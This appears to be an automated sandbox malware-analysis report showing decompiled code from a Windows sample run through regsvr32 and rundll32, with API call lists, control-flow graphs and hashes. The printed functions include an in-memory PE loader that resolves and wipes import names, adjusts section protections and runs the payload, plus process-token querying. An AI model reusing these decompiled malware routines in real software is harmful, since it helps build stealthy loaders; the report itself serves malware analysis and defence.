                                          							_t35 = 0;
                                          							_t33 = (_t35 & 0xffffff00 | __eflags > 0x00000000) + (_t35 & 0xffffff00 | __eflags > 0x00000000) + 2;
                                          						}
                                          					} else {
                                          						asm("bt dword [esi], 0x1f");
                                          						asm("sbb eax, eax");
                                          						_t33 = ( ~((_t31 & 0xffffff00 | _t54 > 0x00000000) & 0x000000ff) & 0x00000020) + 0x20;
                                          					}
                                          					_t34 = VirtualProtect( *((intOrPtr*)(_t51 - 0x18)) + _a4,  *(_t51 - 0x1c), _t33,  &_v16); // executed
                                          					if(_t34 == 0) {
                                          						_v12 = GetLastError();
                                          					}
                                          					_t51 = _t51 + 0x28;
                                          					_v8 = _v8 + 1;
                                          					_t31 = _v8;
                                          					if(_t31 < _v20) {
                                          						continue;
                                          					} else {
                                          						goto L11;
                                          					}
                                          				}
                                          				goto L11;
                                          			}
















                                          APIs
                                          • VirtualProtect.KERNEL32(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00401EE2
                                          • VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401F3A
                                          • GetLastError.KERNEL32 ref: 00401F40
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ProtectVirtual$ErrorLast
                                          • String ID:
                                          • API String ID: 1469625949-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 120 4016e4-4016fb 121 401705 120->121 122 4016fd-401703 120->122 123 40170b-401738 call 401000 call 401d86 121->123 122->123 128 401791-401793 123->128 129 40173a-40175f lstrlenW call 4010fc 123->129 131 401794-401795 ExitThread 128->131 133 401761-40176e 129->133 134 401786-40178a call 401adc 129->134 135 401780-401782 133->135 136 401770-40177e memcpy 133->136 138 40178f 134->138 135->134 136->134 138->131
                                          C-Code - Quality: 100%
                                          			E004016E4() {
                                          				char _v16;
                                          				intOrPtr _v28;
                                          				void _v32;
                                          				void* _v36;
                                          				intOrPtr _t15;
                                          				void* _t16;
                                          				long _t25;
                                          				int _t26;
                                          				intOrPtr _t30;
                                          				void* _t32;
                                          				signed int _t35;
                                          				intOrPtr* _t37;
                                          				intOrPtr _t39;
                                          				int _t44;
                                          
                                          				_t15 =  *0x404144;
                                          				if( *0x40412c > 5) {
                                          					_t16 = _t15 + 0x4050f4;
                                          				} else {
                                          					_t16 = _t15 + 0x4050b1;
                                          				}
                                          				E00401000(_t16, _t16);
                                          				_t35 = 6;
                                          				memset( &_v32, 0, _t35 << 2);
                                          				if(E00401D86( &_v32,  &_v16,  *0x404140 ^ 0xc786104c) == 0) {
                                          					_t25 = 0xb;
                                          				} else {
                                          					_t26 = lstrlenW( *0x404138);
                                          					_t8 = _t26 + 2; // 0x2
                                          					_t44 = _t26 + _t8;
                                          					_t11 = _t44 + 8; // 0xa
                                          					_t30 = E004010FC(_t39, _t11,  &_v32,  &_v36); // executed
                                          					if(_t30 == 0) {
                                          						_t37 = _v36;
                                          						 *_t37 = _t30;
                                          						_t32 =  *0x404138;
                                          						if(_t32 == 0) {
                                          							 *(_t37 + 4) = 0;
                                          						} else {
                                          							memcpy(_t37 + 4, _t32, _t44);
                                          						}
                                          					}
                                          					_t25 = E00401ADC(_v28); // executed
                                          				}
                                          				ExitThread(_t25);
                                          			}


















                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: ExitThreadlstrlenmemcpy
                                          • String ID:
                                          • API String ID: 3726537860-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 37%
                                          			E00401000(void* __eax, intOrPtr _a4) {
                                          
                                          				 *0x404150 =  *0x404150 & 0x00000000;
                                          				_push(0);
                                          				_push(0x40414c);
                                          				_push(1);
                                          				_push(_a4);
                                          				 *0x404148 = 0xc; // executed
                                          				L004011CE(); // executed
                                          				return __eax;
                                          			}




                                          APIs
                                          • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(00401711,00000001,0040414C,00000000), ref: 0040101E
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: DescriptorSecurity$ConvertString
                                          • String ID:
                                          • API String ID: 3907675253-0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 144 401adc-401b08 call 401f61 147 401b65-401b67 144->147 148 401b0a-401b18 call 401ce4 144->148 150 401b68-401b6e 147->150 152 401b51-401b63 call 401938 148->152 153 401b1a-401b2a call 4015c2 148->153 152->150 153->152 157 401b2c-401b2f call 401eb4 153->157 161 401b34-401b38 157->161 161->152 163 401b3a-401b47 161->163 163->152 165 401b49-401b4f GetLastError 163->165 165->152
                                          C-Code - Quality: 84%
                                          			E00401ADC(void* __eax) {
                                          				char _v8;
                                          				void* _v12;
                                          				void* _t17;
                                          				long _t25;
                                          				long _t28;
                                          				intOrPtr* _t33;
                                          				void* _t34;
                                          				intOrPtr* _t35;
                                          				intOrPtr _t37;
                                          
                                          				_t34 = __eax;
                                          				_t17 = E00401F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
                                          				if(_t17 != 0) {
                                          					_t28 = 8;
                                          					goto L8;
                                          				} else {
                                          					_t33 = _v8;
                                          					_t28 = E00401CE4( &_v8, _t33, _t34);
                                          					if(_t28 == 0) {
                                          						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
                                          						_t28 = E004015C2(_t33, _t37);
                                          						if(_t28 == 0) {
                                          							_t25 = E00401EB4(_t37, _t33); // executed
                                          							_t28 = _t25;
                                          							if(_t28 == 0) {
                                          								_push(_t25);
                                          								_push(1);
                                          								_push(_t33);
                                          								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
                                          									_t28 = GetLastError();
                                          								}
                                          							}
                                          						}
                                          					}
                                          					_t35 = _v12;
                                          					 *((intOrPtr*)(_t35 + 0x18))( *((intOrPtr*)(_t35 + 0x1c))( *_t35));
                                          					E00401938(_t35);
                                          					L8:
                                          					return _t28;
                                          				}
                                          			}













                                          APIs
                                            • Part of subcall function 00401F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,00401B06,?,?,?,?,00000002,?,0040178F), ref: 00401F86
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FA8
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FBE
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FD4
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00401FEA
                                            • Part of subcall function 00401F61: GetProcAddress.KERNEL32(00000000,?), ref: 00402000
                                            • Part of subcall function 00401CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,00401B14,?,?,?,?,?,?,00000002), ref: 00401D1B
                                            • Part of subcall function 00401CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 00401D50
                                            • Part of subcall function 004015C2: LoadLibraryA.KERNEL32 ref: 004015F8
                                            • Part of subcall function 004015C2: lstrlenA.KERNEL32 ref: 0040160E
                                            • Part of subcall function 004015C2: memset.NTDLL ref: 00401618
                                            • Part of subcall function 004015C2: GetProcAddress.KERNEL32(?,00000002), ref: 0040167B
                                            • Part of subcall function 004015C2: lstrlenA.KERNEL32(-00000002), ref: 00401690
                                            • Part of subcall function 004015C2: memset.NTDLL ref: 0040169A
                                            • Part of subcall function 00401EB4: VirtualProtect.KERNEL32(00000000,?,00000004,?,?,?,00000000,?,?), ref: 00401EE2
                                            • Part of subcall function 00401EB4: VirtualProtect.KERNEL32(00000000,00000000,00000004,?), ref: 00401F3A
                                            • Part of subcall function 00401EB4: GetLastError.KERNEL32 ref: 00401F40
                                          • GetLastError.KERNEL32(?,0040178F), ref: 00401B49
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 33504255-0
                                          • Opcode ID: b6f527419930b44f40a1ab1d95bac96fd40d74d3357100ee3652cfdc2a43ac8f
                                          • Instruction ID: 2ecac3e89fcf864c5ff4a590cc22b0cc7a05ea2076188f05a12d7ce61af00ae2
                                          • Opcode Fuzzy Hash: b6f527419930b44f40a1ab1d95bac96fd40d74d3357100ee3652cfdc2a43ac8f
                                          • Instruction Fuzzy Hash: 24118A726007116BD7216BA98C85EAB77BCAF54314B00013AF906F7391EB78FD0587A8
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E004015C2(intOrPtr* _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				signed short _v12;
                                          				struct HINSTANCE__* _v16;
                                          				intOrPtr _v20;
                                          				_Unknown_base(*)()* _v24;
                                          				intOrPtr _t34;
                                          				intOrPtr _t36;
                                          				struct HINSTANCE__* _t37;
                                          				intOrPtr _t40;
                                          				CHAR* _t44;
                                          				_Unknown_base(*)()* _t45;
                                          				intOrPtr* _t52;
                                          				intOrPtr _t53;
                                          				signed short _t54;
                                          				intOrPtr* _t57;
                                          				signed short _t59;
                                          				CHAR* _t60;
                                          				CHAR* _t62;
                                          				signed short* _t64;
                                          				void* _t65;
                                          				signed short _t72;
                                          
                                          				_t34 =  *((intOrPtr*)(_a8 + 0x80));
                                          				_v8 = _v8 & 0x00000000;
                                          				_t52 = _a4;
                                          				if(_t34 == 0) {
                                          					L28:
                                          					return _v8;
                                          				}
                                          				_t57 = _t34 + _t52;
                                          				_t36 =  *((intOrPtr*)(_t57 + 0xc));
                                          				_a4 = _t57;
                                          				if(_t36 == 0) {
                                          					L27:
                                          					goto L28;
                                          				}
                                          				while(1) {
                                          					_t62 = _t36 + _t52;
                                          					_t37 = LoadLibraryA(_t62);
                                          					_v16 = _t37;
                                          					if(_t37 == 0) {
                                          						break;
                                          					}
                                          					_v12 = _v12 & 0x00000000;
                                          					memset(_t62, 0, lstrlenA(_t62));
                                          					_t53 =  *_t57;
                                          					_t40 =  *((intOrPtr*)(_t57 + 0x10));
                                          					_t65 = _t65 + 0xc;
                                          					if(_t53 != 0) {
                                          						L6:
                                          						_t64 = _t53 + _t52;
                                          						_t54 =  *_t64;
                                          						if(_t54 == 0) {
                                          							L23:
                                          							_t36 =  *((intOrPtr*)(_t57 + 0x20));
                                          							_t57 = _t57 + 0x14;
                                          							_a4 = _t57;
                                          							if(_t36 != 0) {
                                          								continue;
                                          							}
                                          							L26:
                                          							goto L27;
                                          						}
                                          						_v20 = _t40 - _t64 + _t52;
                                          						_t72 = _t54;
                                          						L8:
                                          						L8:
                                          						if(_t72 < 0) {
                                          							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
                                          								_t59 = 0;
                                          								_v12 =  *_t64 & 0x0000ffff;
                                          							} else {
                                          								_t59 = _t54;
                                          							}
                                          						} else {
                                          							_t59 = _t54 + _t52;
                                          						}
                                          						_t20 = _t59 + 2; // 0x2
                                          						_t44 = _t20;
                                          						if(_t59 == 0) {
                                          							_t44 = _v12 & 0x0000ffff;
                                          						}
                                          						_t45 = GetProcAddress(_v16, _t44);
                                          						_v24 = _t45;
                                          						if(_t45 == 0) {
                                          							goto L21;
                                          						}
                                          						if(_t59 != 0) {
                                          							_t60 = _t59 + 2;
                                          							memset(_t60, 0, lstrlenA(_t60));
                                          							_t65 = _t65 + 0xc;
                                          						}
                                          						 *(_v20 + _t64) = _v24;
                                          						_t64 =  &(_t64[2]);
                                          						_t54 =  *_t64;
                                          						if(_t54 != 0) {
                                          							goto L8;
                                          						} else {
                                          							L22:
                                          							_t57 = _a4;
                                          							goto L23;
                                          						}
                                          						L21:
                                          						_v8 = 0x7f;
                                          						goto L22;
                                          					}
                                          					_t53 = _t40;
                                          					if(_t40 == 0) {
                                          						goto L23;
                                          					}
                                          					goto L6;
                                          				}
                                          				_v8 = 0x7e;
                                          				goto L26;
                                          			}

























                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: lstrlenmemset$AddressLibraryLoadProc
                                          • String ID: ~
                                          • API String ID: 1986585659-1707062198
                                          • Opcode ID: c459e5c4b2257f60a85b8f4a256c25176788778794111ee305b4c7d525299c5e
                                          • Instruction ID: 1541f1383029c81c561c658891bc730305bdf5491dfdc73c382b85a44619650c
                                          • Opcode Fuzzy Hash: c459e5c4b2257f60a85b8f4a256c25176788778794111ee305b4c7d525299c5e
                                          • Instruction Fuzzy Hash: 73316DB5A01206ABDB10CF55CC90AAEB7B8AF44344F25453AE805FB3A0D739EA41CB58
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          C-Code - Quality: 100%
                                          			E0040179C() {
                                          				void* _t1;
                                          				unsigned int _t3;
                                          				void* _t4;
                                          				long _t5;
                                          				void* _t6;
                                          				intOrPtr _t10;
                                          				void* _t14;
                                          
                                          				_t10 =  *0x404130;
                                          				_t1 = CreateEventA(0, 1, 0, 0);
                                          				 *0x40413c = _t1;
                                          				if(_t1 == 0) {
                                          					return GetLastError();
                                          				}
                                          				_t3 = GetVersion();
                                          				if(_t3 != 5) {
                                          					L4:
                                          					if(_t14 <= 0) {
                                          						_t4 = 0x32;
                                          						return _t4;
                                          					} else {
                                          						goto L5;
                                          					}
                                          				} else {
                                          					if(_t3 >> 8 > 0) {
                                          						L5:
                                          						 *0x40412c = _t3;
                                          						_t5 = GetCurrentProcessId();
                                          						 *0x404128 = _t5;
                                          						 *0x404130 = _t10;
                                          						_t6 = OpenProcess(0x10047a, 0, _t5);
                                          						 *0x404124 = _t6;
                                          						if(_t6 == 0) {
                                          							 *0x404124 =  *0x404124 | 0xffffffff;
                                          						}
                                          						return 0;
                                          					} else {
                                          						_t14 = _t3 - _t3;
                                          						goto L4;
                                          					}
                                          				}
                                          			}











                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,004011E0), ref: 004017AB
                                          • GetVersion.KERNEL32(?,004011E0), ref: 004017BA
                                          • GetCurrentProcessId.KERNEL32(?,004011E0), ref: 004017D6
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,004011E0), ref: 004017EF
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.519021404.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000002.00000002.519077118.0000000000405000.00000040.00020000.sdmp
                                          • Associated: 00000002.00000002.519121092.0000000000407000.00000040.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_400000_regsvr32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentEventOpenVersion
                                          • String ID:
                                          • API String ID: 845504543-0
                                          • Opcode ID: aed06d6e456db0b12c0d945e50369df40b064ec9bd77893b2d6cd3ad5d18233c
                                          • Instruction ID: 8f8fe06e61bec74b5f5bb4dd3e414479b260bbff587dc6d4cb96878b245eb472
                                          • Opcode Fuzzy Hash: aed06d6e456db0b12c0d945e50369df40b064ec9bd77893b2d6cd3ad5d18233c
                                          • Instruction Fuzzy Hash: 6DF081B15413019BE7116F787E097553FA5A799713F104036E681FA2F8E37085818B5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Executed Functions

                                          Control-flow Graph

                                          C-Code - Quality: 93%
                                          			E040832BA(signed char* __eax, intOrPtr* _a4) {
                                          				signed int _v12;
                                          				void* _v16;
                                          				CHAR* _v20;
                                          				struct _FILETIME _v28;
                                          				void* _v32;
                                          				void* _v36;
                                          				char* _v40;
                                          				signed int _v44;
                                          				long _v344;
                                          				struct _WIN32_FIND_DATAA _v368;
                                          				signed int _t72;
                                          				void* _t74;
                                          				signed int _t76;
                                          				void* _t78;
                                          				intOrPtr _t81;
                                          				CHAR* _t83;
                                          				void* _t85;
                                          				signed char _t89;
                                          				signed char _t91;
                                          				intOrPtr _t93;
                                          				void* _t96;
                                          				long _t99;
                                          				int _t101;
                                          				signed int _t109;
                                          				char* _t111;
                                          				void* _t113;
                                          				int _t119;
                                          				char _t128;
                                          				void* _t134;
                                          				signed int _t136;
                                          				char* _t139;
                                          				signed int _t140;
                                          				char* _t141;
                                          				char* _t146;
                                          				signed char* _t148;
                                          				int _t151;
                                          				void* _t152;
                                          				void* _t153;
                                          				void* _t154;
                                          				void* _t165;
                                          
                                          				_v12 = _v12 & 0x00000000;
                                          				_t148 = __eax;
                                          				_t72 =  *0x408d2a0; // 0x59935a40
                                          				_t74 = RtlAllocateHeap( *0x408d238, 0, _t72 ^ 0x59935b44);
                                          				_v20 = _t74;
                                          				if(_t74 == 0) {
                                          					L36:
                                          					return _v12;
                                          				}
                                          				_t76 =  *0x408d2a0; // 0x59935a40
                                          				_t78 = RtlAllocateHeap( *0x408d238, 0, _t76 ^ 0x59935a4d);
                                          				_t146 = 0;
                                          				_v36 = _t78;
                                          				if(_t78 == 0) {
                                          					L35:
                                          					HeapFree( *0x408d238, _t146, _v20);
                                          					goto L36;
                                          				}
                                          				_t136 =  *0x408d2a0; // 0x59935a40
                                          				memset(_t78, 0, _t136 ^ 0x59935a4d);
                                          				_t81 =  *0x408d2a4; // 0xbfa5a8
                                          				_t154 = _t153 + 0xc;
                                          				_t5 = _t81 + 0x408e7e8; // 0x73797325
                                          				_t83 = E040877E6(_t5);
                                          				_v20 = _t83;
                                          				if(_t83 == 0) {
                                          					L34:
                                          					HeapFree( *0x408d238, _t146, _v36);
                                          					goto L35;
                                          				}
                                          				_t134 = 0xffffffffffffffff;
                                          				_v28.dwLowDateTime = 0x59935a4d;
                                          				_v28.dwHighDateTime = 0x59935a4d;
                                          				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                          				_v32 = _t85;
                                          				if(_t85 != 0x59935a4d) {
                                          					GetFileTime(_t85,  &_v28, 0, 0);
                                          					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
                                          					asm("adc dword [ebp-0x14], 0xc9"); // executed
                                          					FindCloseChangeNotification(_v32); // executed
                                          				}
                                          				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
                                          				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
                                          				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
                                          				 *_t148 = _t91;
                                          				_v32 = _t91 & 0x000000ff;
                                          				_t93 =  *0x408d2a4; // 0xbfa5a8
                                          				_t16 = _t93 + 0x408e809; // 0x642e2a5c
                                          				_v40 = _t146;
                                          				_v44 = _t89 & 0x000000ff;
                                          				__imp__(_v20, _t16);
                                          				_t96 = FindFirstFileA(_v20,  &_v368); // executed
                                          				_v16 = _t96;
                                          				if(_t96 == _t134) {
                                          					_t146 = 0;
                                          					goto L34;
                                          				}
                                          				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				while(_t99 > 0) {
                                          					_t101 = FindNextFileA(_v16,  &_v368); // executed
                                          					if(_t101 == 0) {
                                          						FindClose(_v16);
                                          						_v16 = FindFirstFileA(_v20,  &_v368);
                                          						_v28.dwHighDateTime = _v344;
                                          						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
                                          					}
                                          					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
                                          				}
                                          				_v12 = _v12 & 0x00000000;
                                          				while(1) {
                                          					_t109 = _v44;
                                          					if(_v12 <= _t109) {
                                          						goto L15;
                                          					}
                                          					_t140 = _v12;
                                          					if(_t140 > _v32) {
                                          						_t141 = _v36;
                                          						 *_a4 = _t141;
                                          						while(1) {
                                          							_t128 =  *_t141;
                                          							if(_t128 == 0) {
                                          								break;
                                          							}
                                          							if(_t128 < 0x30) {
                                          								 *_t141 = _t128 + 0x20;
                                          							}
                                          							_t141 = _t141 + 1;
                                          						}
                                          						_v12 = 1;
                                          						FindClose(_v16); // executed
                                          						_t146 = 0;
                                          						goto L35;
                                          					}
                                          					_t165 = _t140 - _t109;
                                          					L15:
                                          					if(_t165 == 0 || _v12 == _v32) {
                                          						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
                                          						_t139 = _v40;
                                          						_t151 = _t111 -  &(_v368.cFileName);
                                          						_t113 = 0;
                                          						if(_t139 != 0) {
                                          							_t48 = _t151 - 4; // -4
                                          							_t113 = _t48;
                                          							if(_t113 > _t151) {
                                          								_t113 = 0;
                                          							}
                                          						}
                                          						if(_t151 > 4) {
                                          							_t151 = 4;
                                          						}
                                          						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
                                          						_t154 = _t154 + 0xc;
                                          						_v40 =  &(_v40[_t151]);
                                          					}
                                          					do {
                                          						_t119 = FindNextFileA(_v16,  &_v368); // executed
                                          						if(_t119 == 0) {
                                          							FindClose(_v16);
                                          							_v16 = FindFirstFileA(_v20,  &_v368);
                                          						}
                                          					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
                                          					_v12 = _v12 + 1;
                                          				}
                                          			}

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40,00000000), ref: 040832E5
                                          • RtlAllocateHeap.NTDLL(00000000,59935A40), ref: 04083307
                                          • memset.NTDLL ref: 04083321
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,0408333A,73797325), ref: 040877F7
                                            • Part of subcall function 040877E6: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04087811
                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 0408335F
                                          • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 04083373
                                          • FindCloseChangeNotification.KERNEL32(00000000), ref: 0408338A
                                          • StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 04083396
                                          • lstrcat.KERNEL32(?,642E2A5C), ref: 040833D7
                                          • FindFirstFileA.KERNEL32(?,?), ref: 040833ED
                                          • CompareFileTime.KERNEL32(?,?), ref: 0408340B
                                          • FindNextFileA.KERNEL32(0408207E,?), ref: 0408341F
                                          • FindClose.KERNEL32(0408207E), ref: 0408342C
                                          • FindFirstFileA.KERNEL32(?,?), ref: 04083438
                                          • CompareFileTime.KERNEL32(?,?), ref: 0408345A
                                          • StrChrA.SHLWAPI(?,0000002E), ref: 0408348D
                                          • memcpy.NTDLL(00000000,?,00000000), ref: 040834C6
                                          • FindNextFileA.KERNELBASE(0408207E,?), ref: 040834DB
                                          • FindClose.KERNEL32(0408207E), ref: 040834E8
                                          • FindFirstFileA.KERNEL32(?,?), ref: 040834F4
                                          • CompareFileTime.KERNEL32(?,?), ref: 04083504
                                          • FindClose.KERNEL32(0408207E), ref: 04083539
                                          • HeapFree.KERNEL32(00000000,00000000,73797325), ref: 0408354B
                                          • HeapFree.KERNEL32(00000000,?), ref: 0408355B
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$ChangeCreateNotificationlstrcatmemcpymemset
                                          • String ID:
                                          • API String ID: 2944988578-0
                                          • Opcode ID: 640ce32a1b9341df48a89af6c659e594b23f140e0248bd51d996eb9c3331aa4f
                                          • Instruction ID: 165300c744b0e4f2ad980272e05e9c16f4f2630f6160bc880c85c1109090d398
                                          • Opcode Fuzzy Hash: 640ce32a1b9341df48a89af6c659e594b23f140e0248bd51d996eb9c3331aa4f
                                          • Instruction Fuzzy Hash: 94813D71D00219AFEB11AFA4DD44AEEBBB9EF44700F10456DE985F6250E739AA44CF60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 38%
                                          			E040871B9(char _a4, void* _a8) {
                                          				void* _v8;
                                          				void* _v12;
                                          				char _v16;
                                          				void* _v20;
                                          				char _v24;
                                          				char _v28;
                                          				char _v32;
                                          				char _v36;
                                          				char _v40;
                                          				void* _v44;
                                          				void** _t33;
                                          				void* _t40;
                                          				void* _t43;
                                          				void** _t44;
                                          				intOrPtr* _t47;
                                          				char _t48;
                                          
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_v20 = _a4;
                                          				_t48 = 0;
                                          				_v16 = 0;
                                          				_a4 = 0;
                                          				_v44 = 0x18;
                                          				_v40 = 0;
                                          				_v32 = 0;
                                          				_v36 = 0;
                                          				_v28 = 0;
                                          				_v24 = 0;
                                          				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                          					_t33 =  &_v8;
                                          					__imp__(_v12, 8, _t33);
                                          					if(_t33 >= 0) {
                                          						_t47 = __imp__;
                                          						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                          						_t44 = E040858BE(_a4);
                                          						if(_t44 != 0) {
                                          							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                          							if(_t40 >= 0) {
                                          								memcpy(_a8,  *_t44, 0x1c);
                                          								_t48 = 1;
                                          							}
                                          							E0408147E(_t44);
                                          						}
                                          						NtClose(_v8); // executed
                                          					}
                                          					NtClose(_v12);
                                          				}
                                          				return _t48;
                                          			}

                                          APIs
                                          • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 04087200
                                          • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 04087213
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0408722F
                                            • Part of subcall function 040858BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04081C51), ref: 040858CA
                                          • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 0408724C
                                          • memcpy.NTDLL(?,00000000,0000001C), ref: 04087259
                                          • NtClose.NTDLL(?), ref: 0408726B
                                          • NtClose.NTDLL(00000000), ref: 04087275
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.525623570.0000000004081000.00000020.00020000.sdmp, Offset: 04080000, based on PE: true
                                          • Associated: 00000003.00000002.525606133.0000000004080000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525645706.000000000408C000.00000002.00020000.sdmp
                                          • Associated: 00000003.00000002.525663067.000000000408D000.00000004.00020000.sdmp
                                          • Associated: 00000003.00000002.525690686.000000000408F000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_4080000_rundll32.jbxd
                                          Similarity
                                          • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                          • String ID:
                                          • API String ID: 2575439697-0
                                          • Opcode ID: 26b2574642a131a17775a8a9dcac4268d38a8ac41d1c739cd1e069cddc6bbe5a
                                          • Instruction ID: 37215b552f1b28f69c65c64841d696e7e8897465feb94268cbddbf2abce93057
                                          • Opcode Fuzzy Hash: 26b2574642a131a17775a8a9dcac4268d38a8ac41d1c739cd1e069cddc6bbe5a
                                          • Instruction Fuzzy Hash: 0D2116B290021CBBEF01AF94CE859DEBFBDEF58744F10402AFA40B6150D7759A809BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00511A34(intOrPtr* __eax, void** _a4) {
                                          				int _v12;
